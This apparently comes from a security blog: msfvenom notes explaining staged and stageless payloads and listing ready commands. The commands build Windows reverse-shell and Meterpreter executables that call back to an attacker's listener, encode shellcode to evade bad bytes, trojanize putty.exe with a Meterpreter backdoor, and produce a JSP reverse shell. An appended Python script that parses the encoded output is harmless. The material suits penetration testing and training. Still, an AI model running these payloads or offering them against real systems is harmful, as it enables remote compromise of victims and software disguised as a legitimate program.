Msfvenom Notes

msfvenom bash completion

git clone https://github.com/nopernik/msfvenom-bc-generator.git 
cd msfvenom-bc-generator/
cp msfvenom_bc_generator.rb /usr/share/metasploit-framework/
ruby msfvenom_bc_generator.rb

staged and unstaged/stageless

unstaged/stageless

msfvenom -p windows/shell_reverse_tcp

staged

msfvenom -p windows/shell/reverse_tcp

NOTE: a staged payload cannot be caught with nc, because the stager expects the listener to send it the second stage over the connection; nc sends nothing, so a Metasploit handler is required.


NON STAGED

A single payload containing the exploit and full shell code for the selected task. Inline payloads are by design more stable than their counterparts because they contain everything all in one. However, some exploits won't support the resulting size of these payloads.

STAGER

Stager payloads work in conjunction with stage payloads in order to perform a specific task. A stager establishes a communication channel between the attacker and the victim and reads in a stage payload to execute on the remote host.


Staged payloads are ideal when the space available for shellcode is limited; the most common use case is buffer overflows.

Unstaged/stageless payloads send the whole payload to the target at once, with no further data needed from the attacker, so they work with many kinds of listeners (nc, ...).


Command Notes

base

msfvenom -p windows/x64/shell_reverse_tcp LHOST=1.2.3.4 LPORT=443 -f exe -o re64.exe

msfvenom -p windows/shell_reverse_tcp LHOST=1.2.3.4 LPORT=443 -f exe -o re86.exe

msfvenom -p windows/meterpreter_reverse_tcp LHOST=1.2.3.4 LPORT=4445 EXITFUNC=thread -f c

msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python -v payload

cat shellcode | msfvenom --arch windows --platform x86 -b "\x00\x09\x0c\x20\x0a\x0d\x0b" -e x86/shikata_ga_nai -f python -v shellcode | sed -e 's/ b"/ "/g'

(The sed substitution only strips the bytes-literal prefix b" that newer msfvenom versions emit; a plain s/b//g would also delete the b inside hex escapes such as \x8b and corrupt the payload.)
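As an added example (not code from these notes or from Metasploit), the following script parses the text that msfvenom's -f python -v name option produces back into raw bytes, then reports its size, its SHA-256 and which bytes from the -b list are still present. The -f python layout it assumes is the one current versions emit (a name =  b"" line followed by name += b"\x.." lines); older versions omit the b prefix, and both forms are accepted. The sample input is constructed for the example and is not real encoder output.

```python
"""Parse msfvenom `-f python -v <name>` output back into raw bytes and check it.

Added example (not from these notes or from Metasploit). It assumes the text
layout current msfvenom versions emit for `-f python`: one `<name> =  b""` line
followed by `<name> += b"\\x.."` lines. Older versions omit the `b` prefix, and
both forms are accepted. Parsing works on the `\\xNN` escapes themselves, so a
hex digit `b` (as in `\\x8b`) is never confused with the bytes-literal prefix.
"""
import hashlib
import re

# One payload line: `name =  b""` or `name += b"\x..\x.."` (the b prefix is optional).
LINE_RE = re.compile(
    r'^\s*(?P<name>\w+)\s*\+?=\s*b?"(?P<body>(?:\\x[0-9a-fA-F]{2})*)"\s*$'
)
# One `\xNN` escape anywhere in a string.
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Constructed sample in the `-f python -v shellcode` layout; the byte values are
# made up for this example and are not encoder output. It deliberately contains
# a NUL and a newline byte so the bad-byte check below has something to report.
SAMPLE = r'''shellcode =  b""
shellcode += b"\x90\x90\x8b\xc0\x00\x41\x42"
shellcode += b"\xbf\x0a\x43"
'''


def escapes_to_bytes(text):
    """Turn every `\\xNN` escape in `text` into the byte it denotes."""
    return bytes.fromhex("".join(HEX_RE.findall(text)))


def parse_msfvenom_python(text):
    """Return (variable name, payload bytes) for `-f python` output.

    Raises ValueError if a non-blank line is not in the expected layout or
    if the lines use more than one variable name.
    """
    name = None
    out = bytearray()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"line {lineno} is not msfvenom -f python output: {line!r}")
        if name is None:
            name = m.group("name")
        elif m.group("name") != name:
            raise ValueError(f"line {lineno} uses variable {m.group('name')!r}, expected {name!r}")
        out += escapes_to_bytes(m.group("body"))
    if name is None:
        raise ValueError("no payload lines found")
    return name, bytes(out)


def find_bad_bytes(blob, bad):
    """Map each byte of `bad` that occurs in `blob` to the offsets where it appears."""
    return {b: [i for i, c in enumerate(blob) if c == b] for b in bad if b in blob}


def summarize(text, bad_spec):
    """Parse `text` and report size, SHA-256 and any bytes from the -b list still present.

    `bad_spec` uses the same string form msfvenom takes for -b, e.g. r"\\x00\\x0a".
    """
    name, blob = parse_msfvenom_python(text)
    return {
        "name": name,
        "length": len(blob),
        "sha256": hashlib.sha256(blob).hexdigest(),
        "bad_bytes_found": find_bad_bytes(blob, escapes_to_bytes(bad_spec)),
    }


if __name__ == "__main__":
    report = summarize(SAMPLE, r"\x00\x09\x0c\x20\x0a\x0d\x0b")
    print(f"{report['name']}: {report['length']} bytes, sha256 {report['sha256']}")
    for value, offsets in report["bad_bytes_found"].items():
        print(f"  bad byte 0x{value:02x} at offsets {offsets}")
```

Run against the constructed sample it reports 10 bytes with 0x00 at offset 4 and 0x0a at offset 8; run against real msfvenom output (pass the saved text to summarize with the same -b string used when encoding) an empty bad_bytes_found confirms the encoder did what was asked, and the length and hash give a stable record of the exact blob that was produced.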

Get shellcode assembler code

msfvenom -p linux/x86/exec cmd=whoami | ndisasm -u -

Creating customized backdoored executables

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=1.2.3.4 -e x86/shikata_ga_nai -i 33 -b "\x00" -f exe -o puttyX.exe

JSP Shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.IP LPORT=443 -f raw > shell.jsp


Unless stated otherwise, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting.